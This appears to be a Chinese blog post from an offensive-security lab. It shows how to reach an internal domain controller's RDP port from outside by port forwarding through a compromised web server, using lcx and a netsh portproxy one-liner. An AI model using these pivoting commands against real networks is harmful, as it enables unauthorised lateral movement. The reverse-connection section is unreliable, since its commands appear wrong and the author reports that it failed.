今天就来讲一下在企业攻防中如何上线不出网的机器!!
1.基本网络拓扑
基本的网络拓扑就是这样
以下是对应得的P信息,其中的52网段充当一个内网的网段,而111充当公网网段
先ping一下,确保外网ping不通内网,内网ping不通外网
我的电脑:
DC :
2.端口转发(正向TCP连接)
首先要确保的是DC的3389端口是开启的(不开启的话还要去黑掉它让他开启)
这里我选择采用lcx进行端口转发 ,首先肯定是将lcx扔到web机器上面的,然后有以下命令
lcx.exe -tran 8888 192.168.52.138 3389这个意思就是将 192.168.52.138的3389端口转发到web本地机器的8888端口,然后去连接就好
从这里也可以看到外网111.1网段的流量被转发到了内网52.128的3389上
能成功上线到DC上
3.端口转发(反向连接)
这个反向连接,也就是我们常说的反弹shell,条件较为苛刻,需要同时运行lcx
先对于web跳板机的命令,意为开启本地的8888端口来监听6666端口(本地端口转发)
lcx.exe -listen 6666 8888 然后就是在DC上的命令,请求52.143的6666端口来连接本地的3389
lcx.exe -listen 192.168.52.143 6666 127.0.0.1 8888
这样子,内网的端口直接的通信就已经搭建好了
然后我们去主动连接192.168.111.128的8888端口就好
但是这样似乎是会有一些问题,会卡死连不上去
于是我去web跳板机上面看一了一下流量 发现52.138的流量并不是从3389出来的
但是DC上的流量确实是从666出去的
那这样就很奇怪了 
正常来说应该52.138在web上看见的是3389端口啊,
有点抽象 
failed~~ 可能是不知道哪一步出错了
3.不用工具的端口转发
有人就会问了,md,这么麻烦,就不能不上传工具吗? 当然是有方法的啦
你只需要在web服务器上敲上这样一句命令
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8888 connectport=3389 connectaddress=192.168.52.138
这样也是一种端口转发的方法噢,不需要工具
这种也是一种端口转发的正向连接噢
summarization:反向tcp连接没成功,不知道哪里出错了,当然了上线不出网机器可远远不止这一种,明天就更一些别的上线不出网机器的做法!!
